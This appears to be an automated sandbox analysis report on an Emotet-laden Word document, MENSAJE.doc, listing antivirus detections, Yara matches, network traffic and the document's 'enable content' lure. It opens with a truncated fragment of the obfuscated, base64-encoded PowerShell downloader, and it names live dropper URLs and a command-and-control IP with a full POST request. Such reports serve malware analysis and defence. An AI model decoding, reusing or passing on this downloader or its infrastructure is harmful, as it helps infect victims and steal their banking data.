JwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJwArACcANAA3ACcAKQArACcARgAnACkAOwAkAE0AdABuADAANQB2AHIAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQAnACsAJwBMAGkAcQA4AGwANQA4AHsAMAB9ACcAKwAoACcARQBnACcAKwAnAG8AJwApACsAJwBrADcAJwArACcAZQBpAHsAMAB9ACcAKQAgAC0AZgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABHAHEAaAAwAGoAXwBiACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABLADYAOQBXAD0AKAAoACcASAA4ACcAKwAnADkAJwApACsAJwBZACcAKQA7ACQAVABrADEAcQB3AHQAOQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAE8AeQBsAHgAMQBkAGMAPQAoACgAJwB4ACAAWwAnACsAJwAgAHMAJwArACcAaAAnACkAKwAnACAAYgAnACsAJwA6ACcAKwAnAC8AJwArACgAJwAvAG4AJwArACcAYQBkAHkAJwApACsAJwBzACcAKwAoACcAYQAnACsAJwAuAGMAJwApACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACkAKwAnAG4AdAAnACsAJwAvAEEAJwArACgAJwBsAG0AJwArACcAZQB0ACcAKQArACcALwAnACsAJwAhACcAKwAoACcAeAAnACsAJwAgAFsAJwApACsAKAAnACAAcwBoACAAYgAnACsAJwA6AC8ALwBiACcAKwAnAG8AbwBtACcAKwAnAGEAcgBrACcAKQArACgAJwBlAHQAZQAnACsAJwByAC4AJwArACcAYwBvACcAKQArACgAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGMAJwArACcAbwBuAHQAJwArACcAZQAnACkAKwAnAG4AdAAnACsAKAAnAC8AJwArACcANgAvACcAKQArACcAIQAnACsAKAAnAHgAIAAnACsAJwBbACAAcwBoACcAKQArACgAJwAgACcAKwAnAGIAOgAnACkAKwAnAC8ALwAnACsAKAAnAGMAcgBvAG8AJwArACcAawAnACsAJwBzAC0AdABhAHkAbABvAHIAJwApACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAnACsAJwAvACcAKwAoACcAMQA2ACcAKwAnADcANgAnACkAKwAnADQANwAnACsAKAAnADAAOQA3ADMAJwArACcALwAxAC8AIQAnACsAJwB4ACcAKQArACcAIABbACcAKwAnACAAcwAnACsAJwBoACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://lvnskin.com/h/IB/Avira URL Cloud: Label: malware
                      Source: http://nadysa.com/wp-content/Almet/Avira URL Cloud: Label: malware
                      Source: http://crooks-taylor.com/1676470973/1/Avira URL Cloud: Label: malware
                      Source: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/Avira URL Cloud: Label: malware
                      Source: http://rex.tasmiragroup.com/wp-includes/un6G/Avira URL Cloud: Label: malware
                      Source: http://whitetheme.xyz/wp-content/q8H/Avira URL Cloud: Label: malware
                      Source: http://boomarketer.com/wp-content/6/Avira URL Cloud: Label: malware
                      Source: http://nadysa.comAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: http://lvnskin.com/h/IB/Virustotal: Detection: 11%Perma Link
                      Source: http://nadysa.com/wp-content/Almet/Virustotal: Detection: 14%Perma Link
                      Source: http://crooks-taylor.com/1676470973/1/Virustotal: Detection: 13%Perma Link
                      Source: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/Virustotal: Detection: 8%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dllMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dllReversingLabs: Detection: 79%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: MENSAJE.docVirustotal: Detection: 61%Perma Link
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Liq8l58\Egok7ei\D64O.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087319324.0000000001ED7000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2095398011.000000001B840000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: nadysa.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 217.144.106.11:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 217.144.106.11:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in memory: http://nadysa.com/wp-content/Almet/!http://boomarketer.com/wp-content/6/!http://crooks-taylor.com/1676470973/1/!http://whitetheme.xyz/wp-content/q8H/!http://rex.tasmiragroup.com/wp-includes/un6G/!http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/!http://lvnskin.com/h/IB/
                      Source: global trafficHTTP traffic detected: GET /wp-content/Almet/ HTTP/1.1Host: nadysa.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 84.232.229.24 84.232.229.24
                      Source: Joe Sandbox ViewASN Name: NETMIHANIR NETMIHANIR
                      Source: Joe Sandbox ViewASN Name: RCS-RDS73-75DrStaicoviciRO RCS-RDS73-75DrStaicoviciRO
                      Source: global trafficHTTP traffic detected: POST /v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ HTTP/1.1DNT: 0Referer: 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/Content-Type: multipart/form-data; boundary=--------------9AYnZdeXqkvt9nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 84.232.229.24Content-Length: 5972Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4380F3E0-FFD8-4816-B513-C2DC6937B540}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-content/Almet/ HTTP/1.1Host: nadysa.comConnection: Keep-Alive
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: nadysa.com
                      Source: unknownHTTP traffic detected: POST /v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/ HTTP/1.1DNT: 0Referer: 84.232.229.24/v50s5eb3yu/ikc5f/tm3n1kmbtr/xhcy92qsfj3ttmk7xna/nflksuq0nonbqij/Content-Type: multipart/form-data; boundary=--------------9AYnZdeXqkvt9nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 84.232.229.24Content-Length: 5972Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://boomarketer.com/wp-content/6/
                      Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://crooks-taylor.com/1676470973/1/
                      Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://lvnskin.com/h/IB/
                      Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://nadysa.com
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2094995168.000000001B36A000.00000004.00000001.sdmpString found in binary or memory: http://nadysa.com/wp-content/Almet/
                      Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://rabiei.fun/eidl-reconsideration-bs3lu/feoOiAO/
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://rex.tasmiragroup.com/wp-includes/un6G/
                      Source: powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2094297548.00000000039DD000.00000004.00000001.sdmpString found in binary or memory: http://whitetheme.xyz/wp-content/q8H/
                      Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2088948505.0000000002330000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109674521.0000000002820000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: rundll32.exe, 00000006.00000002.2098558453.0000000001E47000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097747134.0000000000B37000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109132236.0000000000A97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2121227769.00000000023D7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: rundll32.exe, 0000000A.00000002.2129931457.0000000000870000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2094406328.0000000003AE8000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000010.00000002.2195836054.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2118741033.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2205409223.0000000000130000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2173526087.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2186412601.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108873547.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2097454036.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163054350.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163067625.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2118727946.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2178762795.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336521474.0000000000720000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2154976635.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2108849548.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2152593179.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2152580168.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338110050.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2173536916.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2129792071.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2129775635.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2188065984.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2121402086.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336299339.0000000000100000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2130727723.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2144677498.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2145636371.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2205471749.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2144648920.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2198917557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2186005336.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2163840941.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2195824360.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2097343885.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2206163057.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2110270893.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                      Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
                      Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
                      Source: Screenshot number: 4Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
